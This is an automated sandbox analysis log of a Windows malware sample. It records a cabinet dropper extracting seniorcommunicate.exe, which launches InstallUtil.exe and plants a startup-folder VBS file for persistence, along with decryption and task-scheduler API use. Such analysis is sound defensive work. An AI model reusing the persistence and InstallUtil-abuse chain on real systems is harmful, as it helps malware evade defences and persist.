                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D5D900_2_00007FF71D1D5D90
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D66C40_2_00007FF71D1D66C4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D40C40_2_00007FF71D1D40C4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D6CA40_2_00007FF71D1D6CA4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D2DB40_2_00007FF71D1D2DB4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D35300_2_00007FF71D1D3530
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1C0C0_2_00007FF71D1D1C0C
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0194E0E81_2_0194E0E8
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_01941A831_2_01941A83
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0194A9301_2_0194A930
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0194A9211_2_0194A921
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0194A8411_2_0194A841
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_01941A831_2_01941A83
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_01949E901_2_01949E90
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_01949EA01_2_01949EA0
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_061B37401_2_061B3740
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_061B05921_2_061B0592
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_061B68D01_2_061B68D0
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_061B37311_2_061B3731
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_061B04481_2_061B0448
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_061BABBF1_2_061BABBF
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0794F1E81_2_0794F1E8
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_0794E5601_2_0794E560
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_079300061_2_07930006
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeCode function: 1_2_079300401_2_07930040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B430886_2_00B43088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B475906_2_00B47590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B448E06_2_00B448E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B448D16_2_00B448D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B4307A6_2_00B4307A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00B4758E6_2_00B4758E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_051F63606_2_051F6360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 36778 bytes, 1 file, at 0x2c +A "seniorcommunicate.exe", ID 2197, number 1, 2 datablocks, 0x1503 compression
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameseniorcommunicate.exe" vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000000.2106170825.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameseniorcommunicate.exe" vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: seniorcommunicate.exe.0.dr, OrderComposerExporter.csCryptographic APIs: 'CreateDecryptor'
                  Source: cvchost.exe.1.dr, OrderComposerExporter.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.48105e8.7.raw.unpack, YSPvguVwPoZuGH59OUX.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, rjm77BLgSlS4gfsq4b.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, lVPThIaqfiNX7UqKFF.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, lVPThIaqfiNX7UqKFF.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.4587ca0.6.raw.unpack, eEMbGORUaTTyJOqnkhL.csCryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 1.2.seniorcommunicate.exe.4cbe598.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 1.2.seniorcommunicate.exe.6150000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: classification engineClassification label: mal100.expl.evad.winEXE@7/3@0/1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D473C CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00007FF71D1D473C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF71D1D1C0C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D66C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA,0_2_00007FF71D1D66C4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D5D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00007FF71D1D5D90
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:64:WilError_03
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeReversingLabs: Detection: 47%
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: advpack.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb0#x source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbZ source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: eulUtil.pdbl source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: wextract.pdb source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbpv source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdbc source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3360530165.00000000052F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000C37000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdb} source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb' source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBp& source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
